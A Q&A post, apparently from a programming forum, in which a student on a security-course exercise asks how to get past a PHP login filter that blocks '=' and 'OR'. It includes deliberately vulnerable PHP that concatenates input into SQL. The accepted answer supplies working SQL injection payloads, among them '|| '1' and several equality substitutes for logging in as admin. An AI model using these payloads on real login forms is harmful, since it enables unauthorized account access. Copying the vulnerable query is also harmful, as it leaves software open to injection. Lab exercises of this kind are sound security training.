# SQL injection with php filtering

Tags: php, mysql, sql, sql-injection, input-filtering

I have to inject a login form for exercise about a computer security course ....
I have passed the first level using the simple

```
' like 1=1--
```

in the password field, but now in the second level i have to inject again the same login form with the same source code except for the fact that user and pwd are being controlled by a function called lvl2_filter() which i think is part of filters.php and do not accept "=" and "OR"

How can i do it ???

both username and password field cannot be empty

```
include_once 'filters.php';
include_once 'config.php';
?>

<?php
$user = lvl2_filter($_REQUEST['user']);
$pwd = lvl2_filter($_REQUEST['pwd']);
$token = $_COOKIE["token_sqli2"];

if (empty($token) || !check_token($token)){
echo "<h1>You need to be logged in!</h1><br>";
}

if (!empty($user) && !empty($pwd)) {
$query = "SELECT user_id FROM users WHERE username='$user' and password='$pwd'";
$result = mysqli_query($db,$query);
if ($result && mysqli_num_rows($result)>0) { 
  echo "Hi $user, you are logged in.";
  verify_user($token, $user);
}
else echo "sorry, invalid username or password"; 
}
else { ?>
```

Answer (score 1, accepted):

Assuming [this definition of `lvl2_filter`](http://pastebin.com/yLTdDcB4), which basically removes any occurrence of `=` and `or` until no longer found, it should still be possible to use the [logical OR operation](http://dev.mysql.com/doc/refman/5.6/en/logical-operators.html#operator_or) with `||` instead of `OR` and a simple expression that evaluates to true like:

```
username: dummy
password: ' || '1
```

This would result in:

```
SELECT user_id FROM users WHERE username='dummy' and password='' || '1'
```

For selecting a specific user, one can use the [rules of boolean algebra](http://en.wikipedia.org/wiki/Boolean_algebra#Basic_operations), where `x=y` = `!(x!=y)`:

```
username: dummy
password: ' || NOT(username<>'admin') AND '1
```

This would result in:

```
SELECT user_id FROM users WHERE username='dummy' and password='' || NOT(username<>'admin') AND '1'
```

Here `<>` is equivalent to `!=` but doesn’t contain a `=`.

There are also other operations that one could use ensure *username* equals `admin`:

- `username BETWEEN 'admin' AND 'admin'`
- `username LIKE 'admin'`
- `username IN ('admin')`
- `IF(STRCMP(username,'admin'), 0, 1)`
- `CASE STRCMP(username,'admin') WHEN 0 THEN 1 ELSE 0 END`
- …